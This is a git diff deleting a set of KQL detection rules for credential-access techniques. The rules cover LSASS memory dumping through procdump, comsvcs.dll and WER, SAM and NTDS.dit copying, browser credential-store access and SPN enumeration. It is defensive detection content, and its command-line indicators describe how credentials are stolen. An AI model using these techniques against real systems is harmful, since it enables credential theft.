Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql deleted file mode 100644 index 0d6a0ceb..00000000 --- a/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/12 -// Level: medium -// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions -// Tags: attack.credential_access, attack.t1552.006 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone") \ No newline at end of file diff --git a/Credential Access/PktMon.EXE_Execution.kql b/Credential Access/PktMon.EXE_Execution.kql deleted file mode 100644 index 6b203914..00000000 --- a/Credential Access/PktMon.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/03/17 -// Level: medium -// Description: Detects execution of PktMon, a tool that captures network packets. -// Tags: attack.credential_access, attack.t1040 -DeviceProcessEvents -| where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe" \ No newline at end of file diff --git a/Credential Access/Potential_Browser_Data_Stealing.kql b/Credential Access/Potential_Browser_Data_Stealing.kql deleted file mode 100644 index e03af167..00000000 --- a/Credential Access/Potential_Browser_Data_Stealing.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/23 -// Level: medium -// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. -Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. -Web browsers typically store the credentials in an encrypted format within a credential store. - -// Tags: attack.credential_access, attack.t1555.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data") \ No newline at end of file diff --git a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql b/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql deleted file mode 100644 index 8c7d33c2..00000000 --- a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/23 -// Level: high -// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it -// Tags: attack.credential_access, attack.t1003 -DeviceProcessEvents -| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider" \ No newline at end of file diff --git a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql b/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql deleted file mode 100644 index e4ed3b9c..00000000 --- a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/23 -// Level: medium -// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it -// Tags: attack.credential_access, attack.t1003 -DeviceRegistryEvents -| where (RegistryKey contains "\\System\\CurrentControlSet\\Services" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) \ No newline at end of file diff --git a/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql b/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql deleted file mode 100644 index 374f0565..00000000 --- a/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Samir Bousseaden -// Date: 2021/11/27 -// Level: critical -// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity -// Tags: attack.credential_access, attack.t1003, attack.t1003.001 -DeviceProcessEvents -| where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe" \ No newline at end of file diff --git a/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql b/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql deleted file mode 100644 index 1e6f67d2..00000000 --- a/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/02/26 -// Level: critical -// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process -// Tags: attack.credential_access, attack.t1003.001 -DeviceRegistryEvents -| where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe" \ No newline at end of file diff --git a/Credential Access/Potential_Credential_Dumping_Via_WER.kql b/Credential Access/Potential_Credential_Dumping_Via_WER.kql deleted file mode 100644 index 0e1eb68b..00000000 --- a/Credential Access/Potential_Credential_Dumping_Via_WER.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @pbssubhash , Nasreddine Bencherchali -// Date: 2022/12/08 -// Level: high -// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass -// Tags: attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) \ No newline at end of file diff --git a/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql b/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql deleted file mode 100644 index 10980eef..00000000 --- a/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/23 -// Level: high -// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control -// Tags: attack.credential_access, attack.t1185 -DeviceProcessEvents -| where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless" \ No newline at end of file diff --git a/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql b/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql deleted file mode 100644 index 2d6086da..00000000 --- a/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/10/30 -// Level: high -// Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. -This way we are also able to catch cases in which the attacker has renamed the procdump executable. - -// Tags: attack.defense_evasion, attack.t1036, attack.credential_access, attack.t1003.001, car.2013-05-009 -DeviceProcessEvents -| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and ProcessCommandLine contains " ls" \ No newline at end of file diff --git a/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql b/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql deleted file mode 100644 index a9505cd1..00000000 --- a/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/21 -// Level: medium -// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump". -Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. -An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. - -// Tags: attack.credential_access, attack.discovery, attack.t1040 -DeviceProcessEvents -| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe" \ No newline at end of file diff --git a/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql b/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql deleted file mode 100644 index 7fe3ec0c..00000000 --- a/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/01/16 -// Level: high -// Description: Detects usage of cmdkey to look for cached credentials on the system -// Tags: attack.credential_access, attack.t1003.005 -DeviceProcessEvents -| where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe") \ No newline at end of file diff --git a/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql b/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql deleted file mode 100644 index 961665a6..00000000 --- a/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: SecurityAura -// Date: 2022/11/16 -// Level: high -// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. -// Tags: attack.credential_access, attack.t1003 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$" \ No newline at end of file diff --git a/Credential Access/Potential_SAM_Database_Dump.kql b/Credential Access/Potential_SAM_Database_Dump.kql deleted file mode 100644 index e28af050..00000000 --- a/Credential Access/Potential_SAM_Database_Dump.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/11 -// Level: high -// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager) -// Tags: attack.credential_access, attack.t1003.002 -DeviceFileEvents -| where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup") \ No newline at end of file diff --git a/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql b/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql deleted file mode 100644 index 7a9ae968..00000000 --- a/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, keepwatch -// Date: 2018/11/14 -// Level: medium -// Description: Detects service principal name (SPN) enumeration used for Kerberoasting -// Tags: attack.credential_access, attack.t1558.003 -DeviceProcessEvents -| where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute")) \ No newline at end of file diff --git a/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql deleted file mode 100644 index e8d18e0e..00000000 --- a/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Janantha Marasinghe -// Date: 2022/11/18 -// Level: medium -// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy -// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082 -DeviceProcessEvents -| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg")) \ No newline at end of file diff --git a/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql b/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql deleted file mode 100644 index 7f64931f..00000000 --- a/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/11 -// Level: high -// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic -// Tags: attack.credential_access, attack.t1546.008 -DeviceProcessEvents -| where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql b/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql deleted file mode 100644 index b4845455..00000000 --- a/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: @SerkinValery -// Date: 2022/09/16 -// Level: medium -// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. -The database might contain authentication tokens and other sensitive information about the logged in accounts. - -// Tags: attack.credential_access, attack.t1528 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")) \ No newline at end of file diff --git a/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql b/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql deleted file mode 100644 index 5a9213f4..00000000 --- a/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022/09/09 -// Level: medium -// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. -This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. - -// Tags: attack.credential_access, attack.discovery, attack.t1552 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-InstanceId 4624" or ProcessCommandLine contains "System[EventID=4624]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4624") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4624") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" or ProcessCommandLine contains "Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational" or ProcessCommandLine contains "Security")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")) \ No newline at end of file diff --git a/Credential Access/PowerShell_Get-Process_LSASS.kql b/Credential Access/PowerShell_Get-Process_LSASS.kql deleted file mode 100644 index 6a75f82e..00000000 --- a/Credential Access/PowerShell_Get-Process_LSASS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/04/23 -// Level: high -// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity -// Tags: attack.credential_access, attack.t1552.004 -DeviceProcessEvents -| where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas" \ No newline at end of file diff --git a/Credential Access/PowerShell_SAM_Copy.kql b/Credential Access/PowerShell_SAM_Copy.kql deleted file mode 100644 index acf9a4b5..00000000 --- a/Credential Access/PowerShell_SAM_Copy.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/07/29 -// Level: high -// Description: Detects suspicious PowerShell scripts accessing SAM hives -// Tags: attack.credential_access, attack.t1003.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(") \ No newline at end of file diff --git a/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql b/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql deleted file mode 100644 index 9feb4708..00000000 --- a/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/07/20 -// Level: medium -// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential -// Tags: attack.credential_access, attack.t1552.004 -DeviceProcessEvents -| where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")) \ No newline at end of file diff --git a/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql b/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql deleted file mode 100644 index 3f8a20a2..00000000 --- a/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/10 -// Level: high -// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory -// Tags: attack.defense_evasion, attack.t1218.011, attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall")))) \ No newline at end of file diff --git a/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql b/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql deleted file mode 100644 index 2530eb6f..00000000 --- a/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/02/18 -// Level: high -// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) -// Tags: attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009 -DeviceProcessEvents -| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full")) \ No newline at end of file diff --git a/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql b/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql deleted file mode 100644 index dfd4dc8d..00000000 --- a/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/09/24 -// Level: high -// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory -// Tags: attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "fullmemdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "-memdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o ") and (ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p ")) or ((FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe") and (ProcessCommandLine contains "fullmemdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "-memdmp")) \ No newline at end of file diff --git a/Credential Access/QuarksPwDump_Dump_File.kql b/Credential Access/QuarksPwDump_Dump_File.kql deleted file mode 100644 index f54a872d..00000000 --- a/Credential Access/QuarksPwDump_Dump_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/02/10 -// Level: critical -// Description: Detects a dump file written by QuarksPwDump password dumper -// Tags: attack.credential_access, attack.t1003.002 -DeviceFileEvents -| where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp" \ No newline at end of file diff --git a/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql b/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql deleted file mode 100644 index 630b3df1..00000000 --- a/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: TropChaud -// Date: 2022/12/19 -// Level: high -// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. -// Tags: attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql b/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql deleted file mode 100644 index fbc2f1fc..00000000 --- a/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/08 -// Level: high -// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. -// Tags: attack.credential_access, attack.t1539, attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/Credential Access/SafetyKatz_Default_Dump_Filename.kql b/Credential Access/SafetyKatz_Default_Dump_Filename.kql deleted file mode 100644 index a2762bbb..00000000 --- a/Credential Access/SafetyKatz_Default_Dump_Filename.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis -// Date: 2018/07/24 -// Level: high -// Description: Detects default lsass dump filename from SafetyKatz -// Tags: attack.credential_access, attack.t1003.001 -DeviceFileEvents -| where FolderPath endswith "\\Temp\\debug.bin" \ No newline at end of file diff --git a/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql b/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql deleted file mode 100644 index 07998e4b..00000000 --- a/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2024/05/10 -// Level: high -// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. -Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. - -// Tags: attack.credential_access, attack.t1003.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") \ No newline at end of file diff --git a/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql b/Credential 